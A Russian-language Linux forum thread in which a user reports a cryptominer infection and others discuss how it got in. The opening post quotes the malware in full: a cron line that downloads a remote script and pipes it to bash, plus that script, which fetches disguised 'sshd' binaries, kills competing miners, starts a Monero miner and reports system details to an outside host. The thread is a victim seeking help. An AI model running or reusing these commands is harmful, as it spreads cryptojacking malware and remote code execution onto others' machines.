Взломали систему

pavelchavyr	# 6 лет, 10 месяцев назад
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Заметил необычно высокую загруженность проца, оказалось, что работает в системе майнер. После непродолжительных поисков нашел в кроне такую строчку: 1 * * * * wget -q -O - http://internetresearch.is/robots.txt 2>/dev/null\|bash; Скачивается вот этот файлик x86_64="http://internetresearch.is/sshd" i686="http://internetresearch.is/sshd.i686" touch .test\|\|cd /dev/shm\|\|cd /tmp 2>/dev/null >$MAIL&&chmod 000 $MAIL rm .test 2>/dev/null rm sshd* 2>/dev/null pkill -9 xmrig 2>/dev/null pid=$(pgrep -f -o 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8') test $pid && pgrep -f 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8' \| grep -vw $pid \| xargs -r kill -9 pgrep -f tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8 && exit 0 wget --no-check-certificate "$x86_64" -O .sshd\|\|curl -k "$x86_64" -o .sshd wget --no-check-certificate "$i686" -O .sshd.i686\|\|curl -k "$i686" -o .sshd.i686 chmod +x .sshd .sshd.i686 pgrep -f hashvault\|\|./.sshd -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B\|\|wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -p)"\|\|curl http://lochjol.com/FAIL --user-agent "$(uname -p)" pgrep -f hashvault\|\|./.sshd.i686 -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B\|\|wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -a)"\|\|curl http://lochjol.com/FAIL --user-agent "$(uname -a)" Процесс я прибил, команду в кроне удалил, но это наверное не все. Где еще проверить?

# 6 лет, 10 месяцев назад

Сообщения: 248

Участник с: 25 января 2011

Заметил необычно высокую загруженность проца, оказалось, что работает в системе майнер. После непродолжительных поисков нашел в кроне такую строчку:
1 * * * * wget -q -O - http://internetresearch.is/robots.txt 2>/dev/null|bash;
Скачивается вот этот файлик

x86_64="http://internetresearch.is/sshd"
i686="http://internetresearch.is/sshd.i686"

touch .test||cd /dev/shm||cd /tmp 2>/dev/null
>$MAIL&&chmod 000 $MAIL
rm .test 2>/dev/null
rm sshd* 2>/dev/null
pkill -9 xmrig 2>/dev/null
pid=$(pgrep -f -o 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8')
test $pid && pgrep -f 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8' | grep -vw $pid | xargs -r kill -9
pgrep -f tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8 && exit 0
wget --no-check-certificate "$x86_64" -O .sshd||curl -k "$x86_64" -o .sshd
wget --no-check-certificate "$i686" -O .sshd.i686||curl -k "$i686" -o .sshd.i686
chmod +x .sshd .sshd.i686
pgrep -f hashvault||./.sshd -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B||wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -p)"||curl http://lochjol.com/FAIL --user-agent "$(uname -p)"
pgrep -f hashvault||./.sshd.i686 -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B||wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -a)"||curl http://lochjol.com/FAIL --user-agent "$(uname -a)"

Процесс я прибил, команду в кроне удалил, но это наверное не все. Где еще проверить?

nafanja	# 6 лет, 10 месяцев назад
Темы: 94 Сообщения: 9252 Участник с: 02 июня 2012 заблокирован	ты чо под рутом сидишь? Псевдографический инсталлятор Arch Linux ver. 3.8.2 Благодарности принимаются на ЯД 410012815723874

pavelchavyr	# 6 лет, 10 месяцев назад
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Нет, но ему привилегий пользователя вполне достаточно.

valentoss78	# 6 лет, 10 месяцев назад
Темы: 15 Сообщения: 440 Участник с: 26 апреля 2016	Кстати, а у меня раз 3 - 5 за последние лет 5 вообще в наглую просто на секунду появлялся чужой рабочий стол с терминалом каким то исполнением команд и панелькой unity ubuntu слева и тут же пропадал, даже тему создавал. Пробовал переустанавливать с полным удалением всех конфигов, чистил вообще жесткий диск, не помогло вроде. Забил. Тогда, когда интересовался, помню, было такое, вроде уязвимости на уровне модема могут быть, вроде о стандартных huawei речь шла, вертикальных. Не знаю как где, а у нас в Ростовской области их тулили всем подключающимся к Ростелеком, типа в аренду с последующим выкупом.

valentoss78

# 6 лет, 10 месяцев назад

Темы: 15

Сообщения: 440

Участник с: 26 апреля 2016

Кстати, а у меня раз 3 - 5 за последние лет 5 вообще в наглую просто на секунду появлялся чужой рабочий стол с терминалом каким то исполнением команд и панелькой unity ubuntu слева и тут же пропадал, даже тему создавал. Пробовал переустанавливать с полным удалением всех конфигов, чистил вообще жесткий диск, не помогло вроде. Забил. Тогда, когда интересовался, помню, было такое, вроде уязвимости на уровне модема могут быть, вроде о стандартных huawei речь шла, вертикальных. Не знаю как где, а у нас в Ростовской области их тулили всем подключающимся к Ростелеком, типа в аренду с последующим выкупом.

Morisson	# 6 лет, 10 месяцев назад
Темы: 18 Сообщения: 1426 Участник с: 11 января 2017	pavelchavyr Процесс я прибил, команду в кроне удалил, но это наверное не все. Где еще проверить? Так запись в кроне жеж от пользователя не создать.

RusWolf	# 6 лет, 10 месяцев назад (отредактировано 6 лет, 10 месяцев назад)
Темы: 11 Сообщения: 2795 Участник с: 16 июля 2016	pavelchavyr Скачивается вот этот файлик А у меня wget даже не установлен. https://t.me/arch_linuxru

genues	# 6 лет, 10 месяцев назад (отредактировано 6 лет, 10 месяцев назад)
Темы: 25 Сообщения: 283 Участник с: 26 сентября 2011	Morisson pavelchavyr Процесс я прибил, команду в кроне удалил, но это наверное не все. Где еще проверить? Так запись в кроне жеж от пользователя не создать. Разве? Просто запускаться будет от имени пользователя, под которым создано задание. Намного важнее определить источник заражения и принять меры.

genues

# 6 лет, 10 месяцев назад (отредактировано 6 лет, 10 месяцев назад)

Темы: 25

Сообщения: 283

Участник с: 26 сентября 2011

Morisson
pavelchavyr
Процесс я прибил, команду в кроне удалил, но это наверное не все. Где еще проверить?
Так запись в кроне жеж от пользователя не создать.

Разве? Просто запускаться будет от имени пользователя, под которым создано задание.

Намного важнее определить источник заражения и принять меры.

Ralph	# 6 лет, 10 месяцев назад
Темы: 4 Сообщения: 105 Участник с: 04 ноября 2013	Как вариант : `sudo chmod 740 /usr/bin/chmod`

pavelchavyr	# 6 лет, 10 месяцев назад
Темы: 25 Сообщения: 248 Участник с: 25 января 2011	Вот как раз источник заражения меня и беспокоит, так как не могу его выявить. Подозреваю, что зашли через ssh, может даже просто сбрутфорсили, пароль слабый стоял. Однако в логах никаких записей подозрительных нет.

corner	# 6 лет, 10 месяцев назад
Темы: 6 Сообщения: 773 Участник с: 21 июля 2011	Еще одна жертва, свеженькая Текст ссылки...